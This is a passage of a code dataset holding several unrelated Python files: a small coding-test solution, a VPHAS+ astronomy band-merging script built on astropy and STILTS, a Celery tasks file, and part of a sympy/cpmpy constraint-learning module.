return len(S)\n\ndef solution(s):\n zero_count, one_count = 0, 0\n for i in s:\n if i == '0':\n zero_count += 1\n else:\n one_count += 1\n\n return abs(zero_count - one_count)\n\n\nprint(solution(\"1011\"))\nprint((solution(\"0110011\")))\nprint(solution(\"000111\"))","repo_name":"algo-gogo/algo_study","sub_path":"프로그래머스/코딩테스트/ssg/one/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72419331165","text":"import sys\nimport warnings\nimport dateutil.parser\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.utils import exceptions\nfrom datetime import timedelta\nimport pkg_resources\nimport tempfile\nimport subprocess\nfrom distutils.util import strtobool\nimport os\n\n__author__ = 'hfarnhill'\ndescription = '''\nConvert VPHAS+ source lists obtained from the ESO archive into\nband-merged catalogues.\n\nEither a list of files, or a directory path which contains only\nthe files to be bandmerged should be provided.\n\nThe script produces single-band catalogues prior to the\nbandmerging, which can be kept by using the -k flag.\n\nThe radii of apertures used to measure flux from VPHAS+ images\nare defined relative to a \"core\" radius of 1 arcsecond. For\napertures 1-7 the radii are:\n1 : 1/2 * rcore\n2 : 1/sqrt(2) * rcore\n3 : rcore\n4 : sqrt(2) * rcore\n5 : 2 * rcore\n6 : 2*sqrt(2) * rcore\n7 : 4 * rcore\nBy default, magnitudes corresponding to the flux measured\nin aperture 3 are returned.\n\nThe crossmatching radius determines the maximum distance\n(in arcsec) between two sources in different filters before\nthey will not be associated.\n'''\n\n\ndef print_colour_warning(message=None):\n print(\"+----------------------------------------------------------------+\")\n if message is not None:\n lenzero = 63 - len(message)\n print('| {0}{1: <{2}}|'.format(message, ' ', lenzero))\n print(\"| Please supply EITHER: |\")\n print(\"| * a full or partial set of RED concatenation source lists, OR |\")\n print(\"| * a full or partial set of BLUE concatenation source lists. |\")\n print(\"| |\")\n print(\"| Do NOT: |\")\n print(\"| * Mix & match from red and blue concatenations |\")\n print(\"+----------------------------------------------------------------+\")\n\n\ndef runmerge(filelist, radius, aperture, xmx, keep, nomerge, clobber):\n if len(filelist) > 8:\n print_colour_warning()\n sys.exit(0)\n\n # Create empty table which will store key FITS header information\n dtype = [('Filename', '|S256'), ('FieldID', '|S10'), ('obsdate', '|S8'), ('Filter', '|S6'), ('Exp', int),\n ('concat', '|S3'), ('order', int)]\n table = np.zeros((len(filelist)), dtype=dtype)\n\n order = {'r_SDSS': 0, 'i_SDSS': 2, 'NB_659': 4, 'u_SDSS': 2, 'g_SDSS': 4}\n\n # Run through the supplied filenames, populating the table with header keywords\n for i, fn in enumerate(filelist):\n table[i]['Filename'] = fn\n h = fits.getheader(fn, 0)\n table[i]['FieldID'] = h[\"OBJECT\"].rstrip()\n table[i]['Filter'] = h[\"HIERARCH ESO INS FILT1 NAME\"].rstrip()\n\n intermediate = {1: 1, 2: 3, 3: 2}\n if h[\"HIERARCH ESO TPL NEXP\"] == 3:\n table[i]['Exp'] = intermediate[h[\"HIERARCH ESO TPL EXPNO\"]]\n else:\n table[i]['Exp'] = h[\"HIERARCH ESO TPL EXPNO\"]\n table[i]['order'] = order[table[i]['Filter']] + table[i]['Exp']\n\n # If the image was obtained after midnight, adjust date observed to agree with start of night's observations\n obsdate = dateutil.parser.parse(h['DATE-OBS'])\n if obsdate.hour < 12:\n obsdate -= timedelta(days=1)\n table[i]['obsdate'] = \"{0}{1:02}{2:02}\".format(obsdate.year, obsdate.month, obsdate.day)\n\n # Use fact that OBS NAME follows format \"p88vphas_1294_hhna\" where first character\n # after field identifier can distinguish between red and blue concatenations.\n # Individual third g pointings will have first character 'g'.\n concat = h[\"HIERARCH ESO OBS NAME\"].split('_')[2][0]\n if concat == 'h':\n table[i]['concat'] = 'red'\n elif concat == 'u':\n table[i]['concat'] = 'blu'\n elif concat == 'g':\n table[i]['concat'] = 'blu'\n table[i]['Exp'] = 3\n table[i]['order'] = 7\n\n # Ensure that red and blue r-band exposures are not being mixed.\n if len(np.unique(table['concat'])) > 1:\n print_colour_warning(\"ERROR: Mix of red and blue concat r-band filters.\")\n sys.exit(0)\n\n # Check that only one unique VPHAS field is being bandmerged\n if len(np.unique(table['FieldID'])) > 1:\n print_colour_warning(\"ERROR: Mix of VPHAS fields.\")\n sys.exit(0)\n\n # Check that there are not too many source lists from any given filter, and that\n # no pointing is repeated (e.g. no 2x r_1 - should be r_1 and r_2)\n if table[0]['concat'] == 'red':\n filter_set = ['r_SDSS', 'i_SDSS', 'NB_659']\n else:\n filter_set = ['r_SDSS', 'u_SDSS', 'g_SDSS']\n filter_max = [2, 2, 3]\n for i, filt in enumerate(filter_set):\n mask = np.where(table['Filter'] == filt)\n if len(table[mask]) > filter_max[i]:\n print_colour_warning(\"ERROR: Too many {0}-band source lists\".format(filt))\n sys.exit(0)\n exposures = np.unique(table[mask]['Exp'], return_counts=True)\n if np.any(exposures[1] > 1):\n print_colour_warning(\"ERROR: Repeated {0}-band pointing source lists\".format(filt))\n sys.exit(0)\n\n # Check that if an Ha image is present, that an r band from the same night is also present (for calibration)\n if 'NB_659' in table['Filter']:\n if 'r_SDSS' not in table['Filter']:\n print_colour_warning(\"Need Halpha and r-band catalogues from same night.\")\n sys.exit(0)\n ha_frames = np.where(table['Filter'] == 'NB_659')\n r_frames = np.where(table['Filter'] == 'r_SDSS')\n for night in np.unique(table[ha_frames]['obsdate']):\n if night not in table[r_frames]['obsdate']:\n print_colour_warning(\"Need Halpha and r-band catalogues from same night.\")\n sys.exit(0)\n\n table = np.sort(table, order=['order'])\n\n for row in table:\n single_band(row, aperture, clobber)\n\n if len(table) > 1 and not nomerge:\n merge(table, radius, clobber, xmx)\n attach_headers(table)\n\n if not keep:\n for row in table:\n outfn = \"{1}_{2}_{3}_{4}.fits\".format(*row)\n os.remove(outfn)\n\n\ndef single_band(fieldinfo, aperture, clobber):\n outfn = \"{1}_{2}_{3}_{4}.fits\".format(*fieldinfo)\n if os.path.isfile(outfn) and not clobber:\n if not check_clobber(outfn):\n sys.exit(0)\n else:\n clobber = True\n\n print(\"+----------------------------------------------------------------+\")\n print(\"| Calculating magnitudes from fluxes using APERTURE {0} for |\".format(aperture))\n print(\"| field {0}, filter {1}, exposure {2}. |\".format(fieldinfo[1], fieldinfo[3], fieldinfo[4]))\n print(\"+----------------------------------------------------------------+\")\n\n filts = {'NB_659': 'Ha', 'r_SDSS': 'r', 'i_SDSS': 'i', 'g_SDSS': 'g', 'u_SDSS': 'u'}\n filtnam = filts[fieldinfo[3]]\n expno = fieldinfo[4]\n\n f = fits.open(fieldinfo[0])\n EXPTIME = float(f[0].header['EXPTIME'])\n\n totrows = 0\n for ccd in range(1, 33):\n totrows += int(f[ccd].header[\"naxis2\"])\n\n outcols = [59, 60, 61, 58, 55, 63, 64, 65, 66]\n if filtnam == 'r' and expno == 1:\n coords = ['RA', 'DEC']\n else:\n coords = ['RA_{0}_{1}'.format(filtnam, expno), 'DEC_{0}_{1}'.format(filtnam, expno)]\n colnames = coords + [\"Class_{0}_{1}\".format(filtnam, expno), \"Av_conf_{0}_{1}\".format(filtnam, expno),\n \"badpix_{0}_{1}\".format(filtnam, expno), \"CCD_{0}_{1}\".format(filtnam, expno),\n \"OID_{0}_{1}\".format(filtnam, expno), \"{0}_{1}\".format(filtnam, expno),\n \"err_{0}_{1}\".format(filtnam, expno)]\n colunits = [\"RADIANS\", \"RADIANS\", \"Flag\", \"Number\", \"Number\", \"Number\", \"Number\", \"mag\", \"mag\"]\n colp = []\n for i in range(len(outcols)):\n outcols[i] -= 1\n f[1].columns[outcols[i]].name = colnames[i]\n f[1].columns[outcols[i]].unit = colunits[i]\n colp.append(f[1].columns[outcols[i]])\n nrows = 0\n for ccd in range(1, 33):\n ZP = float(f[ccd].header[\"MAGZPT\"])\n APCOR = float(f[ccd].header[\"APCOR{0}\".format(aperture)])\n data = f[ccd].data\n rows = f[ccd].header[\"naxis2\"]\n for i in range(rows):\n data[i][62] = float(ccd)\n data[i][63] = float(nrows + i + 1)\n if data[i][23] > 0.:\n data[i][64] = ZP - APCOR - 2.5 * np.log10(data[i][23] / EXPTIME)\n magerr = 2.5 * np.log10(1. + data[i][24] / data[i][23])\n data[i][65] = max(0.001, magerr)\n else:\n data[i][64] = 99.99\n data[i][65] = 99.99\n if ccd == 1:\n newtab = fits.new_table(colp, nrows=totrows)\n else:\n for i in range(len(outcols)):\n newtab.data.field(i)[nrows:nrows + rows] = f[ccd].data.field(outcols[i])\n nrows = nrows + rows\n\n # fill in information for new columns\n newtab.header[\"TTYPE6\"] = \"CCD_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[5] = \"CCD_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT6\"] = \"Number\"\n newtab.header[\"TTYPE7\"] = \"OID_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[6] = \"OID_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT7\"] = \"Number\"\n newtab.header[\"TTYPE8\"] = \"{0}_{1}\".format(filtnam, expno)\n newtab.data.names[7] = \"{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT8\"] = \"mag\"\n newtab.header[\"TTYPE9\"] = \"err_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[8] = \"err_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT9\"] = \"mag\"\n # rename copied columns\n newtab.header[\"TTYPE3\"] = \"Class_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[2] = \"Class_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TTYPE4\"] = \"Av_conf_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[3] = \"Av_conf_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TTYPE5\"] = \"badpix_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[4] = \"badpix_{0}_{1}\".format(filtnam, expno)\n\n warnings.filterwarnings('ignore', category=fits.verify.VerifyWarning, append=True)\n warnings.filterwarnings('ignore', category=exceptions.AstropyUserWarning, append=True)\n\n # copy primary HDU, add file name information and merge with table\n newhdu = fits.PrimaryHDU()\n newhdu.header = f[0].header\n newhdu.header.set(\"CASUFILE\", fieldinfo[0], comment=\"CASU File Name\", after=\"ARCFILE\")\n newhdu.header.set(\"VPHAFILE\", outfn, comment=\"VPHAS File Name\", after=\"CASUFILE\")\n\n # copy information from first header\n clin = f[1].header.cards\n for h in (\n \"MAGZPT\", \"MAGZRR\", \"EXTINCT\", \"APCOR3\", \"MED_PA\", \"NEBULISD\", \"CROWDED\", \"APASSZPT\", \"APASSZRR\",\n \"APASSNUM\"):\n newhdu.header.set(clin[h].keyword, clin[h].value, clin[h].comment)\n\n # Obtain ellipticity and seeing for each CCD append to header.\n # Calculate average value over whole field, append to header\n ellipticity = np.zeros(32)\n seeing = np.zeros(32)\n skylevel = np.zeros(32)\n for i in range(1, 33):\n ellipticity[i - 1] = f[i].header['ELLIPTIC']\n seeing[i - 1] = f[i].header['SEEING']\n skylevel[i - 1] = f[i].header['SKYLEVEL']\n newhdu.header.set(\"SEE_{0}\".format(i), f[i].header['SEEING'],\n comment=\"Average pixel FWHM from CCD{0}\".format(i))\n newhdu.header.set(\"ELL_{0}\".format(i), f[i].header['ELLIPTIC'],\n comment=\"Average ellipticity from CCD{0}\".format(i))\n newhdu.header.set(\"SKY_{0}\".format(i), f[i].header['SKYLEVEL'],\n comment=\"Median sky brightness from CCD{0}\".format(i))\n newhdu.header.set(\"SEEING\", np.mean(seeing) * 0.21, comment=\"Average FWHM (arcsec)\")\n newhdu.header.set(\"ELLIPTIC\", np.mean(ellipticity), comment=\"Average ellipticity\")\n newhdu.header.set(\"SKYLEVEL\", np.median(skylevel), comment=\"Average sky level (counts/pixel)\")\n\n current_module = sys.modules['bandmerge']\n newhdu.header.set(\"HISTORY\", \"created with vphas-bandmerge-standalone v\" + current_module.__version__)\n\n hdulist = fits.HDUList([newhdu, newtab])\n # verify output table and save\n hdulist.writeto(outfn, output_verify='silentfix', clobber=clobber)\n\n\ndef zpcorr(fields):\n zp_shifts = np.zeros(3, dtype=float)\n ha_frames = np.where(fields['Filter'] == 'NB_659')\n r_frames = np.where(fields['Filter'] == 'r_SDSS')\n for i, halpha in enumerate(fields[ha_frames]):\n obsdate = halpha[2]\n rband = fields[r_frames][np.where(fields[r_frames]['obsdate'] == obsdate)][0]\n rfits = fits.getheader(\"{1}_{2}_{3}_{4}.fits\".format(*rband), 0)\n rzp = float(rfits[\"MAGZPT\"])\n hfits = fits.getheader(\"{1}_{2}_{3}_{4}.fits\".format(*halpha), 0)\n hzp = float(hfits[\"MAGZPT\"])\n zpshift = rzp - 3.01 - hzp\n zp_shifts[i] = zpshift\n return zp_shifts\n\n\ndef attach_headers(fields):\n fieldID = fields['FieldID'][0]\n concat = fields['concat'][0]\n outfn = \"{0}_{1}.fits\".format(fieldID, concat)\n merged = fits.open(outfn, mode=\"update\")\n header_primary = merged[0].header\n header_extension = merged[1].header\n\n base_keys = ['OBJECT', 'RA', 'DEC', 'EQUINOX', 'RADECSYS']\n filternames = {'r_SDSS': 'r', 'i_SDSS': 'i', 'NB_659': 'Ha', 'u_SDSS': 'u', 'g_SDSS': 'g'}\n\n for i, field in enumerate(fields):\n single = fits.open(\"{0}\".format(field['Filename']))\n header_single = single[0].header\n # Add the five cards in base_keys to the header of extension #1 without any prefixes/HIERARCH\n # as this will allow Topcat to see them (when opened as FITS, but not FITS-PLUS)\n if i == 0:\n for key in base_keys:\n card = header_single.cards[key]\n header_extension.set(card.keyword, card.value, card.comment)\n # Add all header keywords to merge file with appropriate prefix\n header_primary.__delitem__(4) # Need to delete VOTDATA keyword - file will no longer conform to FITS-PLUS\n for card in header_single.cards[6:-1]:\n k = card.keyword\n if k == \"COMMENT\":\n if not card.value in header_primary.get_comment(): # Don't duplicate comments\n header_primary.add_comment(card.value)\n else:\n k = \"HIERARCH {0}_{1} {2}\".format(filternames[field['Filter']], field['Exp'], k)\n header_primary.set(k, card.value, card.comment)\n single.close()\n\n header_primary.set('EXTEND', 'T')\n\n current_module = sys.modules['bandmerge']\n header_primary.add_history(\"created with vphas-bandmerge-standalone v\" + current_module.__version__)\n warnings.filterwarnings('ignore', category=fits.verify.VerifyWarning, append=True)\n warnings.filterwarnings('ignore', category=exceptions.AstropyUserWarning, append=True)\n merged.writeto(outfn, clobber=True, output_verify='silentfix')\n\n\ndef merge(fields, radius, clobber, xmx):\n # Determine shift to bring Halpha zeropoints into agreement with r-band zeropoints from the same night\n if 'NB_659' in fields['Filter']:\n zp_shifts = zpcorr(fields)\n\n filters = {'red': ['r_SDSS', 'i_SDSS', 'NB_659'], 'blu': ['r_SDSS', 'u_SDSS', 'g_SDSS']}\n filternames = {'r_SDSS': 'r', 'i_SDSS': 'i', 'NB_659': 'Ha', 'u_SDSS': 'u', 'g_SDSS': 'g'}\n filtermultiplicity = {'r_SDSS': 2, 'i_SDSS': 2, 'NB_659': 3, 'u_SDSS': 2, 'g_SDSS': 3}\n\n stilts = pkg_resources.resource_filename(__name__, \"tools/stilts.jar\")\n if fields['concat'][0] == 'red':\n redpath = pkg_resources.resource_filename(__name__, \"tools/red.stilts\")\n tmp = tempfile.NamedTemporaryFile(suffix=\"_red.stilts\")\n scriptpath = tmp.name\n tmp.close()\n f = open(redpath, 'r')\n redscript = f.readlines()\n f.close()\n newscript = open(scriptpath, 'w')\n for line in redscript:\n newscript.write(line)\n newscript.write(\"replacecol Ha_1 \\\"Ha_1+{0}\\\"\\n\".format(zp_shifts[0]))\n newscript.write(\"replacecol Ha_2 \\\"Ha_2+{0}\\\"\\n\".format(zp_shifts[1]))\n newscript.write(\"replacecol Ha_3 \\\"Ha_3+{0}\\\"\\n\".format(zp_shifts[2]))\n else:\n bluepath = pkg_resources.resource_filename(__name__, \"tools/blue.stilts\")\n tmp = tempfile.NamedTemporaryFile(suffix=\"_blu.stilts\")\n scriptpath = tmp.name\n tmp.close()\n f = open(bluepath, 'r')\n bluescript = f.readlines()\n f.close()\n newscript = open(scriptpath, 'w')\n for line in bluescript:\n newscript.write(line)\n\n # Put together keepcol command (i.e. retain only the columns which describe the merged exposures)\n keepcmd = \"keepcols \\\"\"\n for col in ['RA ', 'DEC ']:\n keepcmd += col\n for exposure in fields:\n if exposure['Filter'] == 'r_SDSS' and exposure['Exp'] == 1:\n pass\n else:\n for col in ['dRA', 'dDEC']:\n colid = \"{0}_{1}_{2} \".format(col, filternames[exposure['Filter']], exposure['Exp'])\n keepcmd += colid\n for col in ['Class_', 'Av_conf_', 'badpix_', 'CCD_', 'OID_', '', 'err_']:\n colid = \"{0}{1}_{2} \".format(col, filternames[exposure['Filter']], exposure['Exp'])\n keepcmd += colid\n keepcmd += \"star\\\"\"\n newscript.write(keepcmd)\n newscript.close()\n\n # Check if output file already exists\n outfn = \"{0}_{1}.fits\".format(fields['FieldID'][0], fields['concat'][0])\n if os.path.isfile(outfn) and not clobber:\n if not check_clobber(outfn):\n sys.exit(0)\n\n # Call STILTS\n cmd = [\"java\", \"-Xmx{0}M\".format(xmx), \"-jar\", stilts, \"tmatchn\", \"matcher=sky\", \"params={0}\".format(radius),\n \"multimode=group\", \"nin=7\"]\n i = 1\n for filt in filters[fields['concat'][0]]:\n filtname = filternames[filt]\n for expno in range(1, filtermultiplicity[filt] + 1):\n mask = np.where((fields['Filter'] == filt) & (fields['Exp'] == expno))\n if len(fields[mask]) == 0:\n empty = pkg_resources.resource_filename(__name__, \"tools/{0}_{1}_empty.fits\".format(filt, expno))\n cmd.append(\"in{0}={1}\".format(i, empty))\n else:\n cmd.append(\"in{0}={2}_{3}_{4}_{5}.fits\".format(i, *fields[mask][0]))\n cmd.append(\"join{0}=always\".format(i))\n if filt == 'r_SDSS' and expno == 1:\n cmd.append(\"values{0}=radiansToDegrees(RA) radiansToDegrees(DEC)\".format(i))\n else:\n cmd.append(\"values{0}=radiansToDegrees(RA_{1}_{2}) radiansToDegrees(DEC_{1}_{2})\".format(i, filtname, expno))\n i += 1\n cmd.append(\"out={0}\".format(outfn))\n cmd.append(\"ocmd=@{0}\".format(scriptpath))\n\n print(\"Crossmatching between filters...\")\n subprocess.call(cmd, cwd=os.getcwd())\n\n if fields['concat'][0] == 'red':\n os.remove(scriptpath)\n\n\ndef check_clobber(fn):\n try:\n print(\"+----------------------------------------------------------------+\")\n print(\"| {0} exists.{1: <{2}}|\".format(fn, ' ', 55 - len(fn)))\n print(\"| Continuing requires that this file be overwritten. |\")\n print(\"| Note: You can avoid this message by specifying (-c) when |\")\n print(\"| invoking this script. |\")\n print(\"+----------------------------------------------------------------+\")\n response = raw_input(\"Continue? (y/n) > \")\n response_bool = strtobool(response.lower())\n except ValueError:\n print(\"Invalid input.\")\n response_bool = check_clobber(fn)\n return response_bool\n\n\ndef process(args=None):\n import argparse\n import glob\n\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-f', action='store', nargs='+', dest='files', help='Filenames of source lists.')\n group.add_argument('-d', action='store', nargs=1, dest='dir',\n help='Path of directory containing source lists for merging.')\n parser.add_argument('-a', action='store', nargs=1, dest='aperture', default=[3], type=int,\n help='Aperture # for measuring flux. Default = 3.')\n parser.add_argument('-r', action='store', nargs=1, dest='radius', default=[0.5], type=float,\n help='Crossmatching radius (arcsec). Default = 0.5.')\n parser.add_argument('-x', action='store', nargs=1, dest='xmx', default=[2048], type=int,\n help='Memory (in MB) for crossmatching. Default = 2048.')\n parser.add_argument('-k', action='store_true', dest='keep', default=False,\n help='Keep intermediate single-band catalogues.')\n parser.add_argument('-n', action='store_true', dest='nomerge', default=False,\n help='No bandmerging step (only generate single-band files)')\n parser.add_argument('-c', action='store_true', dest='clobber', default=False,\n help='Overwrite pre-existing files (no warnings!)')\n args = parser.parse_args(args)\n\n if not (0 < args.aperture[0] < 8):\n parser.error(\"\")\n\n if args.nomerge:\n args.keep = True\n\n if args.files is None and args.dir is not None:\n filelist = glob.glob(\"{0}*.fits\".format(args.dir[0]))\n runmerge(filelist, args.radius[0], args.aperture[0], args.xmx[0], args.keep, args.nomerge, args.clobber)\n elif args.files is not None and args.dir is None:\n runmerge(args.files, args.radius[0], args.aperture[0], args.xmx[0], args.keep, args.nomerge, args.clobber)\n","repo_name":"lewyh/vphas-bandmerge-standalone","sub_path":"bandmerge/bandmerge.py","file_name":"bandmerge.py","file_ext":"py","file_size_in_byte":21817,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"70479895006","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author :Leo\n@Connect :lipf0627@163.com\n@File :tasks.py\n@Site :\n@Time :2019/5/26 14:20\n@Software :PyCharm\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nimport time\nfrom celery import task, shared_task\n\n\n@task\ndef test(a, b):\n print('这是任务开始')\n print(a+b)\n time.sleep(10)\n print('这是任务结束')\n\n\n@shared_task\ndef test_beat(x, y):\n print(x+y)\n\n","repo_name":"TeamOfWeekend/mysite","sub_path":"home/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"579780742","text":"import itertools as it\nfrom sympy import symbols, lambdify, sympify, Symbol\nimport numpy as np\nimport logging\nimport json\nfrom cpmpy import *\nfrom cpmpy.solvers import CPM_ortools\nfrom cpmpy.solvers.ortools import OrtSolutionCounter\nfrom cpmpy.transformations.get_variables import *\nfrom cpmpy_helper import solveAll\nfrom instance import Instance\nimport time\nfrom musx import musx\n\nfrom cpmpy.transformations.flatten_model import get_or_make_var\n\nlogger = logging.getLogger(__name__)\n\n\ndef pairs(example):\n for [x, y] in it.product(example, repeat=2):\n yield x, y\n\n\ndef index_pairs(exampleLen):\n for (i, j) in it.combinations(range(exampleLen), r=2):\n yield i, j\n\n\ndef unary_operators():\n def modulo(x):\n return x % 2\n\n def power(x):\n return x * x\n\n def identity(x):\n return x\n\n for f in [identity, abs]:\n yield f\n\n\ndef generate_unary_exp(x):\n yield x\n # for u in unary_operators():\n # yield u(x)\n\n\ndef binary_operators(x, y):\n # for u in unary_operators():\n yield x + y\n yield x - y\n yield y - x\n\n\ndef generate_binary_expr(x, y):\n yield x + y\n yield x - y\n yield y - x\n yield abs(y - x)\n # yield abs(x-y)\n\n # for b in binary_operators(x, y):\n # for u in generate_unary_exp(b):\n # yield u\n\n\ndef constraint_learner(solutions, n_vars):\n bounds = dict()\n x, y = symbols(\"x y\")\n for u in generate_unary_exp(x):\n k = str(u)\n bounds[k] = dict()\n f = lambdify(x, u, \"math\")\n for i in range(n_vars):\n bounds[k][(i,)] = {}\n vals = f(solutions[:, i])\n bounds[k][(i,)][\"l\"] = min(vals)\n bounds[k][(i,)][\"u\"] = max(vals)\n\n for b in generate_binary_expr(x, y):\n k = str(b)\n bounds[k] = dict()\n f = lambdify([x, y], b, \"math\")\n for (i, j) in index_pairs(n_vars):\n bounds[k][(i, j)] = {}\n vals = f(solutions[:, i], solutions[:, j])\n bounds[k][(i, j)][\"l\"] = min(vals)\n bounds[k][(i, j)][\"u\"] = max(vals)\n return bounds\n\n\ndef filter_negatives(negData, lb, ub): # InComplete\n x, y = symbols(\"x y\")\n for u in generate_unary_exp(x):\n k = str(u)\n\n for i in range(len(lb[k])):\n breaksLB = 0\n for example in negData:\n if u.subs({x: example[i]}) < lb[k][i]:\n breaksLB = 1\n break\n if breaksLB == 0:\n del lb[k]\n\n breaksUB = 0\n for example in negData:\n if u.subs({x: example[i]}) > ub[k][i]:\n breaksUB = 1\n break\n if breaksUB == 0:\n del ub[k]\n\n # for b in generate_binary_expr(x,y):\n # k=str(b)\n #\n # for i in range(len(lb[k])):\n # breaksLB = 0\n # for example in negData:\n # if b.subs({x:v1, y: v2})ub[k][i]:\n # breaksUB = 1\n # break\n # if breaksUB == 1:\n # break\n # if breaksUB == 0:\n # del ub[k]\n #\n # for u in generate_unary_exp(x):\n # for b in generate_binary_expr(x,y):\n # k = str(u)\n # k = k.replace('x', '(' + str(b) + ')')\n # breaksLB = 0\n # for example in negData:\n # for i, (v1, v2) in enumerate(pairs(example)):\n # if u.subs({x: b.subs({x: v1, y: v2})}) < lb[k][i]:\n # breaksLB = 1\n # break\n # if breaksLB == 1:\n # break\n # if breaksLB == 0:\n # del lb[k]\n #\n # breaksUB = 0\n # for example in negData:\n # for i, (v1, v2) in enumerate(pairs(example)):\n # if u.subs({x: b.subs({x: v1, y: v2})}) > ub[k][i]:\n # breaksUB = 1\n # break\n # if breaksUB == 1:\n # break\n # if breaksUB == 0:\n # del ub[k]\n return lb, ub\n\n\ndef create_variables(var_bounds, name):\n return [\n intvar(lb, ub, name=f\"{name}[{i}]\")\n for i, (lb, ub) in enumerate(var_bounds)\n ]\n\n\ndef create_model(var_bounds, expr_bounds, name):\n x, y = symbols(\"x y\")\n cp_vars = create_variables(var_bounds, name)\n\n m = Model()\n for expr, inst in expr_bounds.items():\n for (index), values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n if len(index) == 1:\n e = sympify(expr)\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if lb != v.lb:\n m += [cpm_e >= lb]\n if ub != v.ub:\n m += [cpm_e <= ub]\n else:\n e = sympify(expr)\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if lb != v.lb:\n m += [cpm_e >= lb]\n if ub != v.ub:\n m += [cpm_e <= ub]\n\n return m, cp_vars\n\n\ndef is_sat(m, m_vars, sols, exp, objectives=None):\n sats = []\n for i, sol in enumerate(sols):\n m2 = Model([c for c in m.constraints])\n m2 += [m_var == sol[i] for i, m_var in enumerate(m_vars)]\n sat = m2.solve()\n if objectives is not None and sat:\n sat = exp(sol) == objectives[i]\n sats.append(sat)\n return sats\n\n\ndef check_solutions(m, mvars, sols, exp, objectives=None):\n if len(sols) == 0:\n print(\"No solutions to check\")\n return 100\n\n sats = is_sat(m, mvars, sols, exp, objectives)\n logger.info(f\"{sum(sats)} satisfied out of {len(sats)}\")\n return sum(sats) * 100.0 / len(sats)\n\n\ndef check_solutions_fast(m: Model, m_vars, sols, objective_exp, objective_values):\n if sols is None:\n print(\"No solutions to check\")\n return 100\n correct_objective = sols\n\n # remove duplicates, if any (happens for type06)\n for i in reversed(range(len(sols))): # backward, for del\n for j in range(i): # forward up to and without i\n if np.array_equal(sols[i], sols[j]):\n # sols are equal, check to drop 'i' (at back)\n if objective_values is None:\n del sols[i]\n break\n elif objective_values[i] == objective_values[j]:\n del sols[i]\n del objective_values[i]\n break\n\n # filter out based on objective values, if present\n if objective_values is not None:\n correct_objective = []\n for i, sol in enumerate(sols):\n if objective_exp(sol) == objective_values[i]:\n correct_objective.append(sol)\n\n # print(len(sols), len(correct_objective))\n s = SolverLookup.get(\"ortools\", m)\n s += Table(\n m_vars,\n correct_objective\n )\n cnt = solveAll(s)\n # print(cnt, len(correct_objective))\n logger.info(f\"{cnt} satisfied out of {len(sols)}\")\n return cnt * 100.0 / len(sols), cnt, len(correct_objective), len(sols)\n\n\ndef solutions_sample(model: Model, instance: Instance, size):\n rng = np.random.RandomState(111)\n m_vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n vars_lb = np.hstack([instance.var_lbs[k].flatten() for k in instance.var_lbs])\n vars_ub = np.hstack([instance.var_ubs[k].flatten() for k in instance.var_ubs])\n # print(vars, vars_lb, vars_ub)\n sols = []\n start = time.time()\n while len(sols) < size and time.time() - start < 60:\n sol = []\n m_copy = Model([c for c in model.constraints])\n for i, var in enumerate(m_vars):\n random_val = rng.randint(vars_lb[i], vars_ub[i])\n sol.append(random_val)\n m_copy += [var == random_val]\n if m_copy.solve():\n sols.append(sol)\n return sols\n\n\n# def solutions(model: Model, size):\n# rng = np.random.RandomState(111)\n# cp_vars = get_variables_model(model)\n# # print(cp_vars)\n# s = SolverLookup.get(\"ortools\", model)\n# # s += sum(cp_vars) >= 0\n# vars_lb = []\n# vars_ub = []\n# for var in cp_vars:\n# vars_lb.append(var.lb)\n# vars_ub.append(var.ub)\n# sols = []\n# sol_count = 0\n# while s.solve() and sol_count < size:\n# sols.append([var.value() for var in cp_vars])\n# s += ~all([var == var.value() for var in cp_vars])\n# initial_point = []\n# for i, v in enumerate(cp_vars):\n# initial_point.append(rng.randint(vars_lb[i], vars_ub[i]))\n# s.solution_hint(cp_vars, initial_point)\n# sol_count += 1\n# return sols\n\n\ndef solutions(model: Model, instance: Instance, size):\n rng = np.random.RandomState(111)\n s = SolverLookup.get(\"ortools\", model)\n # model = Model([c for c in model.constraints])\n # model = CPM_ortools(model)\n vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n s += sum(vars) >= 0\n vars_lb = np.hstack([instance.var_lbs[k].flatten() for k in instance.var_lbs])\n vars_ub = np.hstack([instance.var_ubs[k].flatten() for k in instance.var_ubs])\n\n sols = []\n sol_count = 0\n while s.solve() and sol_count < size:\n sols.append([var.value() for var in vars])\n s += ~all([var == var.value() for var in vars])\n initial_point = []\n for i, v in enumerate(vars):\n initial_point.append(rng.randint(vars_lb[i], vars_ub[i]))\n s.solution_hint(vars, initial_point)\n sol_count += 1\n return sols\n\n\ndef statistic(model1, model2, instance: Instance, size=100):\n sols = solutions(model1, instance, size)\n print(f\"Number of solutions: {len(sols)}\")\n if len(sols) == 0:\n return 0\n # print(len(sols), type(sols), type(sols[0]), 